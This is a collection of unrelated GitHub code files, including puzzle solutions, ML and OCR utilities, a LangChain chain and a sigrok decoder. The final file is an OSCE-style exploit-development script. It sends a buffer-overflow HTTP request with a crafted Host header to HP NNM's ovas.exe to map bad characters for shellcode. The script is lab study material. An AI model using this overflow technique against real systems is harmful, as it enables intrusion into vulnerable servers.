    """Time a single challenge *callback*, print its result and runtime, and
    update the module-wide challenge counter / total-time bookkeeping."""
    global CHALLENGE_COUNT
    global TOTAL_TIME
    CHALLENGE_COUNT += 1
    print(f'--- Challenge {CHALLENGE_COUNT}')
    started = timer()
    result = callback(*args, **kwargs)
    elapsed_ms = (timer() - started) * 1000
    TOTAL_TIME += elapsed_ms
    print(f'Output: {result}')
    print(f'Took: {elapsed_ms:.2f}ms')
    print()
    return result
def test_input():
    """Ensure input.txt exists, downloading it via the project's http helper
    when a session cookie is available; exits the program on failure."""
    if not Path(SCRIPT_DIR, 'input.txt').is_file():
        # No cached input: try to fetch it using the stored session cookie.
        session_cookie = http.get_session_cookie(ROOT_DIR)
        if session_cookie is None:
            print('[AoC] No input found! Please download the input first, or put your session cookie in '
                  '_session.txt to download the input automatically.')
            sys.exit(1)
        print('[AoC] Automatically downloading input data...')
        try:
            input_data = http.download_input(session_cookie, int(PUZZLE_YEAR), int(PUZZLE_DAY))
        except http.InvalidCookieException:
            print('[AoC] Invalid cookie in _session.txt. Try entering it again.')
            sys.exit(1)
        # download_input returns None when the puzzle isn't unlocked yet.
        if input_data is None:
            print('[AoC] Puzzle has not yet been unlocked. Nice try!')
            sys.exit(1)
        with Path(SCRIPT_DIR, 'input.txt').open('w+') as file:
            file.write(input_data)
        print('[AoC] Successfully downloaded input data.')
        print()
print()
# Banner printed once on import, identifying the puzzle being solved.
print('-------- Advent of Code --------\n'
      f'Solution for Dec {PUZZLE_DAY}, {PUZZLE_YEAR}\n'
      '--------------------------------\n')
| DismissedGuy/AdventOfCode | aoc/__init__.py | __init__.py | py | 2,327 | python | en | code | 1 | github-code | 50 |
39856574480 | """
Given a 2D integer array matrix, return the transpose of matrix.
The transpose of a matrix is the matrix flipped over its main diagonal, switching the matrix's row and column indices.
Example 1:
Input: matrix = [[1,2,3],[4,5,6],[7,8,9]]
Output: [[1,4,7],[2,5,8],[3,6,9]]
Example 2:
Input: matrix = [[1,2,3],[4,5,6]]
Output: [[1,4],[2,5],[3,6]]
Constraints:
m == matrix.length
n == matrix[i].length
1 <= m, n <= 1000
1 <= m * n <= 10^5
-10^9 <= matrix[i][j] <= 10^9
"""
class Solution:
    def transpose(self, matrix: [[int]]) -> [[int]]:
        """Return the transpose of *matrix* (rows become columns).

        zip(*matrix) pairs the i-th element of every row, which is exactly
        column i; this replaces the manual index bookkeeping and works for
        any rectangular m x n input.
        """
        return [list(column) for column in zip(*matrix)]
13073056978 | #!/usr/bin/env python3
import os
import time

# Generate lists of increasing size and time the Java sorter on each.
for i in range(5000, 10000, 10):
    os.system("python3 longList.py " + str(i))
    # Bug fixes vs. the original: os.system() returns the command's EXIT
    # STATUS, not its runtime, and exporting TIMEFORMAT in a separate shell
    # never reaches the next command -- so measure the wall-clock time of the
    # java run in-process instead, and close the output file properly.
    start = time.perf_counter()
    os.system("time java SortsRunner list.txt")
    elapsed = time.perf_counter() - start
    with open("selection.txt", "a+") as f:
        f.write(str(elapsed) + "\n")
    # Original early-exit kept: stop after three sizes (5000, 5010, 5020).
    if i == 5020:
        break
| smjaques/Java | asgn1/runTimes.py | runTimes.py | py | 290 | python | en | code | 0 | github-code | 50 |
29331952171 | import cv2
import numpy as np
from .ocr_redaction import OCR
from .speech_filter import hate_speech_detection
import pytesseract
pytesseract.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'
def content_filtering(image = '../relay/img/screen.png'):
    """Run EAST+OCR text detection on *image*, classify the detected words
    with the hate-speech filter, and build a white mask with black redaction
    bands over lines containing blacklisted words.

    Returns (mask, reshaped_boxes): the redaction mask (same size as the
    loaded image) and the per-word boxes rescaled to image coordinates.

    NOTE(review): the original file's indentation was lost; the nesting of
    the drawing branches below was reconstructed -- confirm against the
    upstream repository.
    """
    east = 'text/data/frozen_east_text_detection.pb' # path to input EAST text detector
    extractor = OCR(east)
    # Inputs
    confidence = 0.5 # minimum probability required to inspect a region
    width = 320 # resized image width (should be multiple of 32)
    height = 320 # resized image height (should be multiple of 32)
    display = False # Display bounding boxes
    numbers = False # Detect only numbers
    percentage = 2.0 # Expand/shrink detected bound box
    min_boxes = 1 # minimum number of detected boxes to return
    max_iterations = 20 # max number of iterations finding min_boxes
    ocr_data, size = extractor.get_image_text(
        image,
        width,
        height,
        display,
        numbers,
        confidence,
        percentage,
        min_boxes,
        max_iterations)
    texts = ocr_data['text'] # ocr_data.keys()
    left = ocr_data['left']
    top = ocr_data['top']
    width_ocr = ocr_data['width']
    height_ocr = ocr_data['height']
    # band=True redacts whole horizontal bands; False would outline words only.
    band = True
    print(texts)
    loaded_image = cv2.imread(image)
    # Start from an all-white mask the size of the loaded image.
    mask= np.zeros((loaded_image.shape[0], loaded_image.shape[1], 3), np.uint8)
    mask=np.where(mask==0, 255, mask)
    # Boxes in the OCR's resized coordinate space (orig_boxes itself is unused).
    orig_boxes = [[left[i], top[i], left[i]+width_ocr[i], top[i]+height_ocr[i]] for i in range(len(left))]
    # Normalize to [0,1] fractions of the OCR image, then rescale to the
    # loaded image's pixel grid (note: shape[1] is width, shape[0] is height).
    box_proportions = [[left[i]/size[0], top[i]/size[1], (left[i]+width_ocr[i])/size[0], (top[i]+height_ocr[i])/size[1]] for i in range(len(left))]
    reshaped_boxes = [[int(box[0]*loaded_image.shape[1]), int(box[1]*loaded_image.shape[0]), int(box[2]*loaded_image.shape[1]), int(box[3]*loaded_image.shape[0])] for box in box_proportions]
    # words to filter out; can replace with topical model / fake news detection model
    # blacklist = [s.lower() for s in ['COVID-19', 'Trump', 'Queen']]
    blacklist = [s.lower() for s in hate_speech_detection(texts)]
    trigger = False; counter = 0;
    for start_X, start_Y, end_X, end_Y in reshaped_boxes:
        if texts[counter].lower() in blacklist:
            trigger = True
            # color the word only
            if band == False:
                cv2.rectangle(mask, (start_X, start_Y), (end_X, end_Y), (0, 255, 0), 2)
            if band == True:
                # NOTE(review): loaded_image.shape[0] (the image HEIGHT) is
                # used as the band's right-edge x-coordinate; shape[1] (width)
                # looks intended -- confirm before relying on full-width bands.
                cv2.rectangle(mask, (0, start_Y), (loaded_image.shape[0], end_Y), (0, 0, 0), -1)
                trigger = False
        counter+=1
    return mask, reshaped_boxes
| greaseuniverse/greaseterminator | interventions/text/text_filter.py | text_filter.py | py | 2,942 | python | en | code | 1 | github-code | 50 |
26255921148 | """Create a ChatVectorDBChain for question/answering."""
from langchain.callbacks.base import AsyncCallbackManager
from langchain.callbacks.tracers import LangChainTracer
from langchain.chains import ChatVectorDBChain
from langchain.chains.chat_vector_db.prompts import (CONDENSE_QUESTION_PROMPT,
QA_PROMPT)
from langchain.chains.llm import LLMChain
from langchain.chains.question_answering import load_qa_chain
from langchain.llms import OpenAI
from langchain.vectorstores.base import VectorStore
from langchain.prompts.prompt import PromptTemplate
prompt = """Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question.
You are FixBot, a repair bot that can answer questions about fixing things using information from iFixit, the free repair guide for every thing.
Use the following pieces of context to answer the user's question.
If you don't know the answer, just say that you don't know, don't try to make up an answer. Do not make up links or sources.
Where possible, direct the user to buy a part from iFixit.
Assume the user is going to perform the repair themselves. Do not recommend an authorized repair service or manufacturer repair options.
If asked how to perform a task, tell the user that you recommend they follow the full repair guide and not your instructions. Then provide a short summary of the repair guide and link to it.
Your output should always be plain text. Do not use markdown or wiki markup.
ALWAYS return a "SOURCES" part in your answer.
The "SOURCES" part should be a reference to the source of the document from which you got your answer.
Chat History:
{chat_history}
Follow Up Input: {question}
Standalone question:"""
prompt = PromptTemplate.from_template(prompt)
def get_chain(
    vectorstore: VectorStore, question_handler, stream_handler, tracing: bool = False
) -> ChatVectorDBChain:
    """Create a ChatVectorDBChain for question/answering.

    Uses two LLMs: a streaming one (with *stream_handler*) for the combine-docs
    answer step and a non-streaming one (with *question_handler*) for question
    condensation. When *tracing* is set, a LangChain tracer is attached to all
    three callback managers.
    """
    base_manager = AsyncCallbackManager([])
    question_manager = AsyncCallbackManager([question_handler])
    stream_manager = AsyncCallbackManager([stream_handler])
    if tracing:
        tracer = LangChainTracer()
        tracer.load_default_session()
        for mgr in (base_manager, question_manager, stream_manager):
            mgr.add_handler(tracer)

    question_gen_llm = OpenAI(
        temperature=0,
        verbose=True,
        callback_manager=question_manager,
    )
    streaming_llm = OpenAI(
        streaming=True,
        callback_manager=stream_manager,
        verbose=True,
        temperature=0,
    )
    question_generator = LLMChain(
        llm=question_gen_llm, prompt=prompt, callback_manager=base_manager
    )
    doc_chain = load_qa_chain(
        streaming_llm, chain_type="stuff", prompt=QA_PROMPT, callback_manager=base_manager
    )
    return ChatVectorDBChain(
        vectorstore=vectorstore,
        combine_docs_chain=doc_chain,
        question_generator=question_generator,
        callback_manager=base_manager,
    )
| kpister/prompt-linter | data/scraping/repos/iFixit~chat/query_data.py | query_data.py | py | 3,228 | python | en | code | 0 | github-code | 50 |
42725712340 | import os
import time
import datetime
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
# Compute the number of transactions per day, fraudulent transactions per day and fraudulent cards per day
def get_tx_stats(transactions_df, start_date_df="2020-04-01"):
# Number of transactions per day
nb_tx_per_day = transactions_df.groupby(
['TX_TIME_DAYS'])['CUSTOMER_ID'].count()
# Number of fraudulent transactions per day
nb_fraudulent_transactions_per_day = transactions_df.groupby(['TX_TIME_DAYS'])[
'TX_FRAUD'].sum()
# Number of compromised cards per day
nb_compromised_cards_per_day = transactions_df[transactions_df['TX_FRAUD'] == 1].groupby(
['TX_TIME_DAYS']).CUSTOMER_ID.nunique()
tx_stats = pd.DataFrame({"nb_tx_per_day": nb_tx_per_day,
"nb_fraudulent_transactions_per_day": nb_fraudulent_transactions_per_day,
"nb_compromised_cards_per_day": nb_compromised_cards_per_day})
tx_stats = tx_stats.reset_index()
start_date = datetime.datetime.strptime(start_date_df, "%Y-%m-%d")
tx_date = start_date+tx_stats['TX_TIME_DAYS'].apply(datetime.timedelta)
tx_stats['tx_date'] = tx_date
return tx_stats
def get_train_test_set(transactions_df, start_date_training, delta_train=7, delta_delay=7, delta_test=7):
    """Temporal train/test split for fraud detection.

    Training set: *delta_train* days starting at *start_date_training*.
    Test set: *delta_test* daily slices starting *delta_train + delta_delay*
    days after the training start, with transactions from already-known
    compromised cards removed. Returns (train_df, test_df), both sorted by
    TRANSACTION_ID.
    """
    # Get the training set data
    train_df = transactions_df[(transactions_df.TX_DATETIME >= start_date_training) &
                               (transactions_df.TX_DATETIME < start_date_training+datetime.timedelta(days=delta_train))]
    # Get the test set data
    test_df = []
    # Note: Cards known to be compromised after the delay period are removed from the test set
    # That is, for each test day, all frauds known at (test_day-delay_period) are removed
    # First, get known defrauded customers from the training set
    known_defrauded_customers = set(
        train_df[train_df.TX_FRAUD == 1].CUSTOMER_ID)
    # Get the relative starting day of training set (easier than TX_DATETIME to collect test data)
    start_tx_time_days_training = train_df.TX_TIME_DAYS.min()
    # Then, for each day of the test set
    for day in range(delta_test):
        # Get test data for that day
        test_df_day = transactions_df[transactions_df.TX_TIME_DAYS == start_tx_time_days_training +
                                      delta_train+delta_delay +
                                      day]
        # Compromised cards from that test day, minus the delay period, are added to the pool of known defrauded customers
        # NOTE(review): the "delay period" day used below is delta_train+day-1,
        # i.e. it does not involve delta_delay at all -- confirm this offset is
        # the intended definition of "test day minus delay period".
        test_df_day_delay_period = transactions_df[transactions_df.TX_TIME_DAYS == start_tx_time_days_training +
                                                   delta_train +
                                                   day-1]
        new_defrauded_customers = set(
            test_df_day_delay_period[test_df_day_delay_period.TX_FRAUD == 1].CUSTOMER_ID)
        known_defrauded_customers = known_defrauded_customers.union(
            new_defrauded_customers)
        test_df_day = test_df_day[~test_df_day.CUSTOMER_ID.isin(
            known_defrauded_customers)]
        test_df.append(test_df_day)
    test_df = pd.concat(test_df)
    # Sort data sets by ascending order of transaction ID
    train_df = train_df.sort_values('TRANSACTION_ID')
    test_df = test_df.sort_values('TRANSACTION_ID')
    return (train_df, test_df)
def fit_model_and_get_predictions(classifier, train_df, test_df,
                                  input_features, output_feature="TX_FRAUD", scale=True):
    """Fit *classifier* on the training frame, predict fraud probabilities on
    both frames, and return a dict with the fitted model, the probability
    arrays and the wall-clock fit/predict times (seconds).

    When *scale* is True (the default), the features are first scaled with
    the module's scaleData helper.
    """
    if scale:
        (train_df, test_df) = scaleData(train_df, test_df, input_features)

    started = time.time()
    classifier.fit(train_df[input_features], train_df[output_feature])
    training_execution_time = time.time() - started

    # predict_proba returns one row per transaction; column 1 is P(fraud).
    started = time.time()
    predictions_test = classifier.predict_proba(test_df[input_features])[:, 1]
    prediction_execution_time = time.time() - started

    predictions_train = classifier.predict_proba(train_df[input_features])[:, 1]

    return {
        'classifier': classifier,
        'predictions_test': predictions_test,
        'predictions_train': predictions_train,
        'training_execution_time': training_execution_time,
        'prediction_execution_time': prediction_execution_time,
    }
| redhat-partner-ecosystem/fsi-fraud-detection | notebooks/simulator/training.py | training.py | py | 5,086 | python | en | code | 0 | github-code | 50 |
def _read_grid(size):
    """Parse *size* whitespace-separated rows of ints from stdin."""
    return [list(map(int, input().split())) for _ in range(size)]


def _rotate_ccw(grid):
    """Rotate *grid* 90 degrees counter-clockwise (new[n-1-j][i] = old[i][j]),
    the same transformation the original applied repeatedly."""
    size = len(grid)
    rotated = [[0] * size for _ in range(size)]
    for i in range(size):
        for j in range(size):
            rotated[size - 1 - j][i] = grid[i][j]
    return rotated


def _is_sorted_grid(grid):
    """True when every row is non-decreasing left-to-right AND the first
    column is non-decreasing top-to-bottom (exactly the original's check)."""
    for i in range(1, len(grid)):
        if grid[i][0] < grid[i - 1][0]:
            return False
    for row in grid:
        for j in range(1, len(row)):
            if row[j] < row[j - 1]:
                return False
    return True


def _print_grid(grid):
    """Print the grid, one space-separated row per line."""
    for row in grid:
        print(" ".join(str(value) for value in row))


# The original duplicated the rotate/check/print logic four times (and kept a
# large commented-out copy at the end); this refactor checks the same four
# orientations in the same order -- as-is, then 90/180/270 degrees
# counter-clockwise -- printing every orientation that is sorted.
lines = int(input())
current = _read_grid(lines)
for _ in range(4):
    if _is_sorted_grid(current):
        _print_grid(current)
    current = _rotate_ccw(current)
18727794630 | from django.conf.urls import url
from .views import event, login, profile, friends
# URL routes for the helloers API endpoints.
# NOTE(review): the patterns have no trailing '$' anchor, so e.g. r'^api/event'
# also matches 'api/events' and any longer path with that prefix -- confirm
# this prefix matching is intended.
urlpatterns = [
    url(r'^api/event', event, name='event'),
    url(r'^api/login', login, name='login'),
    url(r'^api/profile', profile, name='profile'),
    url(r'^api/friends', friends, name='friends')
]
| stanislavBozhanov/hello | hello_back_end/helloers/urls.py | urls.py | py | 295 | python | en | code | 0 | github-code | 50 |
29473290269 | __author__ = 'srkiyengar'
import os
import logging.handlers
scriptname = os.path.basename(__file__)
LOG_LEVEL = logging.INFO  # intended level for this module's logger
# Set up a logger with output level set to debug; Add the handler to the logger
# NOTE(review): no handler is actually attached and LOG_LEVEL is never applied
# here, so records fall through to logging's default handling -- confirm a
# handler is configured elsewhere.
my_logger = logging.getLogger("UR5_Logger")
my_dir = "../trials"  # default directory holding the trial output files
class match:
    """Pairs UR5 pose files with matching color .npy image files found in a
    trial directory; files are paired by their shared 6-character filename
    prefix, which is recorded in self.id."""

    def __init__(self, dname):
        # Flag rather than raise when the directory is missing so callers can
        # check .success (mirrors the original behavior).
        if not os.path.exists(dname):
            my_logger.info("{}:The directory {} does not exist".format(scriptname, dname))
            self.success = False
        else:
            self.success = True
        self.dname = dname
        self.ur5_files = []  # filenames containing "ur5"
        self.npy_files = []  # color image dumps: contain both "npy" and "color"
        self.id = []         # shared 6-char prefixes of paired files

    def pickup_files(self):
        """Scan self.dname (top level only) and bucket its filenames."""
        # Bug fix: use the builtin next() instead of the Python-2-only
        # generator method .next(), so this works on Python 2.6+ and 3.
        all_files = next(os.walk(self.dname))[2]
        for name in all_files:
            if "ur5" in name:
                self.ur5_files.append(name)
            elif "npy" in name and "color" in name:
                self.npy_files.append(name)

    def pair_files(self):
        """Record the 6-char prefix of every ur5 file that has a color .npy
        file sharing the same prefix."""
        for name in self.ur5_files:
            for image_file in self.npy_files:
                if name[0:6] == image_file[0:6]:
                    self.id.append(name[0:6])
                    break
if __name__ == "__main__":
a = match(my_dir)
a.pickup_files()
a.pair_files()
print(a.id)
| srkiyengar/ur5_client | src/match.py | match.py | py | 1,410 | python | en | code | 1 | github-code | 50 |
36795359974 | import sigrokdecode as srd
import binascii
import struct
import traceback
from .handlers import *
# ...
RX = 0  # index for the UART receive direction in the per-direction state lists
TX = 1  # index for the UART transmit direction
# these reflect the implicit IDs for the 'annotations' variable defined below.
# if you renumber 'annotations', you'll have to change these to match.
ANN_MESSAGE = 0  # annotation class: decoded messages
ANN_ERROR = 1  # annotation class: invalid/malformed messages
ANN_BYTES = 2  # annotation class: individual raw bytes
class Decoder(srd.Decoder):
    """sigrok protocol decoder that interprets decoded UART data bytes as
    LEGO Boost hub/peripheral messages, dispatching each complete message to
    a handle_message_XX function from the handlers module."""
    api_version = 3
    id = 'boost'
    name = 'Boost'
    longname = 'LEGO Boost'
    desc = 'LEGO Boost Hub and Peripherals.'
    license = 'gplv2+'
    inputs = ['uart']
    outputs = ['boost']
    options = (
        {'id': 'show_errors', 'desc': 'Show errors?', 'default': 'no', 'values': ('yes', 'no')},
        {'id': 'show_bytes', 'desc': 'Show message bytes?', 'default': 'no', 'values': ('yes', 'no')}
    )
    annotations = (
        ('messages', 'Valid messages that pass checksum'),
        ('errors', 'Invalid/malformed messages'),
        ('bytes', 'Each individual byte'),
    )
    annotation_rows = (
        ('messages', 'Messages', (ANN_MESSAGE,) ),
        ('errors', 'Errors', (ANN_ERROR,) ),
        ('bytes', 'Bytes', (ANN_BYTES,) )
    )

    def __init__(self):
        self.reset()

    def reset(self):
        # Per-direction (RX/TX) accumulation state:
        self.message = [[], []]        # bytes collected so far for the current message
        self.ss_block = [None, None]   # start sample of the message being built
        self.es_block = [None, None]   # last end sample seen for that message

    def start(self):
        self.out_ann = self.register(srd.OUTPUT_ANN)

    def putx(self, rxtx, data, ss=None, es=None):
        """Emit annotation *data* for direction *rxtx*, defaulting the sample
        range to the currently tracked block; errors/bytes annotations are
        suppressed unless the corresponding option is enabled."""
        if(not ss):
            ss = self.ss_block[rxtx]
        if(not es):
            es = self.es_block[rxtx]
        if(data[0] == ANN_ERROR and self.options['show_errors'] == 'no'):
            return
        if(data[0] == ANN_BYTES and self.options['show_bytes'] == 'no'):
            return
        self.put(ss, es, self.out_ann, data)

    def decode(self, ss, es, data):
        """Consume one UART packet; accumulate DATA bytes into the current
        message and reset the accumulator once a message is consumed."""
        ptype, rxtx, pdata = data
        # For now, ignore all UART packets except the actual data packets.
        if ptype != 'DATA':
            return
        # We're only interested in the byte value (not individual bits).
        pdata = pdata[0]
        # If this is the start of a command/reply, remember the Start Sample number.
        if self.message[rxtx] == []:
            self.ss_block[rxtx] = ss
        # Append a new byte to the currently built/parsed command.
        self.message[rxtx].append(pdata)
        self.putx(rxtx, [ANN_BYTES, ['{:02X}'.format(pdata)]], ss=ss, es=es)
        # note our current End Sample number.
        self.es_block[rxtx] = es
        # self.putx(rxtx, [0, [str(binascii.hexlify(bytes(self.message[rxtx])))]])
        # will return something if message is complete, False or None if we're waiting on more bytes
        if(self.handle_message(rxtx, self.message[rxtx])):
            self.message[rxtx] = []

    # attempt to find a handler function for this message
    def handle_message(self, rxtx, msg):
        """Dispatch *msg* to handle_message_<first byte in hex>; return True
        when the message was consumed (handled or unhandled), False while
        more bytes are still needed."""
        # if we have a handler available for this message type, use it
        try:
            funcname = 'handle_message_{:02X}'.format(msg[0])
            # func = getattr(handlers, funcname)
            func = globals()[funcname]
            # print(funcname, func)
            res = func(msg)
            # print(res)
            if(res):
                self.putx(rxtx, res)
                return True
            return False
        except Exception as e:
            # Deliberate swallow: a missing/failed handler falls through to
            # the consume-by-default return below.
            pass
        # no handler found.
        # we don't want to handle this message again, so return True to consume it
        return True
| dracode/sigrok-lego-boost | boost/pd.py | pd.py | py | 3,482 | python | en | code | 3 | github-code | 50 |
#.CSV (Comma Separated Values) file
#is a type of plain text file that uses specific structuring to arrange tabular data
#because it is a plain text file, it can contain only actual text data (printable ASCII or Unicode characters).
#a .CSV file uses a comma to separate each specific data value
#CSV files are created by programs that handle large amounts of data
#they are a convenient way to export data from spreadsheets and databases, as well as to import it or use it in other programs
#e.g. you can export the results of a data mining program to a CSV file and then import that into a spreadsheet to analyze the data,
#generate graphs for a presentation, or prepare a report for publication
import csv

# newline='' is required when handing a file to csv.writer: without it the
# writer's own '\r\n' row terminators get translated again on Windows,
# producing a blank line between every record (see the csv module docs).
with open('employee_file.csv', mode='w', newline='') as employee_file:
    employee_writer = csv.writer(employee_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
    # If quoting is set to csv.QUOTE_MINIMAL, then .writerow() will quote fields only if they contain the delimiter or the quotechar. This is the default case.
    # If quoting is set to csv.QUOTE_ALL, then .writerow() will quote all fields.
    # If quoting is set to csv.QUOTE_NONNUMERIC, then .writerow() will quote all fields containing text data and convert all numeric fields to the float data type
    # If quoting is set to csv.QUOTE_NONE, then .writerow() will escape delimiters instead of quoting them. In this case, you also must provide a value for the escapechar optional parameter.
    employee_writer.writerow(['Dennis Mwangi', 'Developer', 'November'])
    employee_writer.writerow(['Vinicent Opiyo', 'Agile', 'February'])
23393766489 | from torch import nn
import torch.nn.functional as F
from torch_geometric.nn import SAGEConv
from key_info_extraction.utils import ID2LABEL
class SageNet(nn.Module):
    """Four-layer GraphSAGE node classifier (in_channels -> 64 -> 32 -> 16 ->
    n_classes) with ReLU activations and dropout between layers."""

    def __init__(self, in_channels, n_classes=len(ID2LABEL.keys()), dropout_rate=0.2, bert_model='vinai/phobert-base',
                 device='cuda'):
        # bert_model and device are kept for interface compatibility with
        # existing callers; they are not used inside this module.
        super(SageNet, self).__init__()
        self.conv1 = SAGEConv(in_channels=in_channels, out_channels=64)
        self.relu1 = nn.ReLU()
        self.conv2 = SAGEConv(in_channels=64, out_channels=32)
        self.relu2 = nn.ReLU()
        self.conv3 = SAGEConv(in_channels=32, out_channels=16)
        self.relu3 = nn.ReLU()
        self.conv4 = SAGEConv(in_channels=16, out_channels=n_classes)
        self.dropout_rate = dropout_rate

    def forward(self, data):
        """Return per-node class logits for a torch_geometric data object
        (uses data.embedding, data.edge_index and data.edge_attr)."""
        edge_index, edge_weight = data.edge_index, data.edge_attr
        # Bug fix: F.dropout defaults to training=True, so the original
        # applied dropout even in eval mode; pass training=self.training so
        # model.eval() actually disables it.
        x = F.dropout(self.relu1(self.conv1(data.embedding, edge_index, edge_weight)),
                      p=self.dropout_rate, training=self.training)
        x = F.dropout(self.relu2(self.conv2(x, edge_index, edge_weight)),
                      p=self.dropout_rate, training=self.training)
        x = F.dropout(self.relu3(self.conv3(x, edge_index, edge_weight)),
                      p=self.dropout_rate, training=self.training)
        return self.conv4(x, edge_index, edge_weight)
| manhph2211/MC-OCR | key_info_extraction/models/phobert_sage.py | phobert_sage.py | py | 1,228 | python | en | code | 26 | github-code | 50 |
37344733255 | '''
Crie um programa que leia o nome de uma cidade diga se ela começa ou não com o nome "SANTO".
'''
# Read a city name and report whether it starts with "Santo".
# Strip surrounding whitespace so stray spaces don't break the check, and
# compare in upper case to make the test case-insensitive.
cidade = input('Digite o nome de uma cidade: ').strip()
ini = cidade.upper().find('SANTO')
# (The stray debug print of the find() result has been removed.)
if ini == 0:
    print('\nO primeiro nome da cidade é Santo')
elif ini == -1:
    print('\nPalavra não existe')
else:
    print('\nO primeiro nome da cidade NÃO é Santo')
| igorbalbino/Estudos-Python | VerificandoLetrasDoTexto.py | VerificandoLetrasDoTexto.py | py | 390 | python | pt | code | 0 | github-code | 50 |
73799333915 | #!/usr/bin/env python2
# reference: CTP/OSCE
# author: greyshell
# description: identify good and bad chars in HPNNM-B.07.53
# dependency: python version: 2.7.x, pyenv-win==1.2.2, pywin32==218, WMI==1.4.9, pydbg
# 1) download the `dependency.zip` file.
# 2) extract the `pydbg.zip` inside your python `lib\site-packages` directory.
# 3) install `pywin32-218.win32-py2.7.exe` and `WMI-1.4.9.win32.exe`.
import os
import socket
import subprocess
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# global variables
all_chars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# HTTP request skeleton sent to ovas.exe; the Host: header ({}) is the
# injection point and the oversized Content-Length drives the overflow.
request_template = (
    "GET /topology/homeBaseView HTTP/1.1\r\n"
    "Host: {}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
    "Content-Length: 1048580\r\n\r\n"
)

# current char that is being checked
cur_char = ""
bad_chars = []  # chars found mangled in the crashed process's memory
good_chars = []  # chars that survived in memory unmodified
evil_str_sent = False  # handshake flag between debugger loop and sender thread
service_is_running = False  # set once ovas.exe is confirmed up and responsive
def chars_to_str(chars):
    """Render an iterable of single characters as a '\\xNN'-escaped string."""
    # str.join builds the result in one pass instead of the original's
    # quadratic repeated string concatenation.
    return "".join("\\x{:02x}".format(ord(char)) for char in chars)
def crash_service():
    # send malformed data to ovas service in order to crash it. function runs in an independent thread
    """Sender thread: for each candidate char, build an overflow buffer with
    the char repeated at the probed offset and fire it at the service; if no
    crash happens within ~10s, mark the char bad (it prevented the crash) and
    kill the service so it gets restarted.

    NOTE(review): indentation reconstructed from a whitespace-stripped dump;
    the placement of the wait-timer lines in the else branch and the final
    unreachable `return` was inferred -- confirm against upstream.
    """
    global evil_str_sent, cur_char, bad_chars, good_chars, all_chars
    global service_is_running
    char_counter = -1  # index into all_chars of the char under test
    timer = 0          # seconds waited for a crash on the current char
    while True:
        # don't send evil string if process is not running
        if not service_is_running:
            time.sleep(1)
            continue
        # if main loop reset the evil_str_sent flag to False, sent evil_str again
        if not evil_str_sent:
            timer = 0
            char_counter += 1
            if char_counter > len(all_chars) - 1:
                # All 256 chars processed: report and hard-exit the process.
                print("[+] bad chars: {}.".format(chars_to_str(bad_chars)))
                print("[+] good chars: {}.".format(chars_to_str(good_chars)))
                print("[+] done.")
                # hack to exit application from non-main thread
                os._exit(0)
            cur_char = all_chars[char_counter]
            # during crash [ESP + 4C] points to ("A" * 1025)th position
            crash = "A" * 1025 + cur_char * 4 + "B" * 2551
            evil_str = request_template.format(crash)
            print("[+] sending evil HTTP request...")
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.connect(("127.0.0.1", 7510))
                sock.send(evil_str)
                sock.close()
            except Exception as e:
                print("[+] error sending malicious buffer, service may be down.")
                print("[+] restarting the service and retrying...")
                print(e)
                service_is_running = False
                subprocess.Popen('taskkill /f /im ovas.exe').communicate()
            finally:
                evil_str_sent = True
        else:
            # Buffer already sent: wait for the debugger to observe a crash.
            if timer > 10:
                print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
                print("[+] marking last char as bad and killing the service...")
                bad_chars.append(cur_char)
                print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
                with open("bad_chars.txt", 'w') as f:
                    f.write(chars_to_str(bad_chars))
                service_is_running = False
                subprocess.Popen('taskkill /f /im ovas.exe').communicate()
            time.sleep(1)
            timer += 1
    # Unreachable (the loop above never exits normally); kept from original.
    return
def is_service_started():
    # check if service was successfully started
    """Poll the WMI process list (up to 5 attempts, 1s apart) for ovas.exe.
    Returns its PID when found, False after 5 failed attempts.

    NOTE(review): if service_is_running is flipped True by another thread the
    loop exits and implicitly returns None (falsy) -- confirm intended.
    """
    print("[+] making sure the service was restarted...")
    service_check_counter = 0
    while not service_is_running:
        if service_check_counter > 4:  # give it 5 attempts
            return False
        for process in wmi.WMI().Win32_Process():
            if process.Name == 'ovas.exe':
                return process.ProcessId
        service_check_counter += 1
        time.sleep(1)
